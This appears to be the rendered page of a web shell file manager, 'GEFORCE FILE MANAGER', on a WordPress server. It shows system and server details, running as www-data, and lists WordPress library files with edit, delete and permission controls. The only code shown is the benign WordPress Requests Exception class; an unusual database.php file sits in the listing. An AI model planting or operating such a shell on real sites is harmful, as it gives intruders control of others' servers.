[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
Requests
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Auth
SET
[ DEL ]
📁 Cookie
SET
[ DEL ]
📁 Exception
SET
[ DEL ]
📁 Proxy
SET
[ DEL ]
📁 Response
SET
[ DEL ]
📁 Transport
SET
[ DEL ]
📁 Utility
SET
[ DEL ]
📄 Auth.php
860 B
SET
[ EDIT ]
|
[ DEL ]
📄 Autoload.php
9,335 B
SET
[ EDIT ]
|
[ DEL ]
📄 Capability.php
652 B
SET
[ EDIT ]
|
[ DEL ]
📄 Cookie.php
15,389 B
SET
[ EDIT ]
|
[ DEL ]
📄 Exception.php
1,114 B
SET
[ EDIT ]
|
[ DEL ]
📄 HookManager.php
709 B
SET
[ EDIT ]
|
[ DEL ]
📄 Hooks.php
3,032 B
SET
[ EDIT ]
|
[ DEL ]
📄 IdnaEncoder.php
12,435 B
SET
[ EDIT ]
|
[ DEL ]
📄 Ipv6.php
5,639 B
SET
[ EDIT ]
|
[ DEL ]
📄 Iri.php
29,622 B
SET
[ EDIT ]
|
[ DEL ]
📄 Port.php
1,505 B
SET
[ EDIT ]
|
[ DEL ]
📄 Proxy.php
867 B
SET
[ EDIT ]
|
[ DEL ]
📄 Requests.php
34,001 B
SET
[ EDIT ]
|
[ DEL ]
📄 Response.php
4,281 B
SET
[ EDIT ]
|
[ DEL ]
📄 Session.php
9,107 B
SET
[ EDIT ]
|
[ DEL ]
📄 Ssl.php
5,425 B
SET
[ EDIT ]
|
[ DEL ]
📄 Transport.php
1,544 B
SET
[ EDIT ]
|
[ DEL ]
📄 database.php
943 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Exception.php
<?php /** * Exception for HTTP requests * * @package Requests\Exceptions */ namespace WpOrg\Requests; use Exception as PHPException; /** * Exception for HTTP requests * * @package Requests\Exceptions */ class Exception extends PHPException { /** * Type of exception * * @var string */ protected $type; /** * Data associated with the exception * * @var mixed */ protected $data; /** * Create a new exception * * @param string $message Exception message * @param string $type Exception type * @param mixed $data Associated data * @param integer $code Exception numerical code, if applicable */ public function __construct($message, $type, $data = null, $code = 0) { parent::__construct($message, $code); $this->type = $type; $this->data = $data; } /** * Like {@see \Exception::getCode()}, but a string code. * * @codeCoverageIgnore * @return string */ public function getType() { return $this->type; } /** * Gives any relevant data * * @codeCoverageIgnore * @return mixed */ public function getData() { return $this->data; } }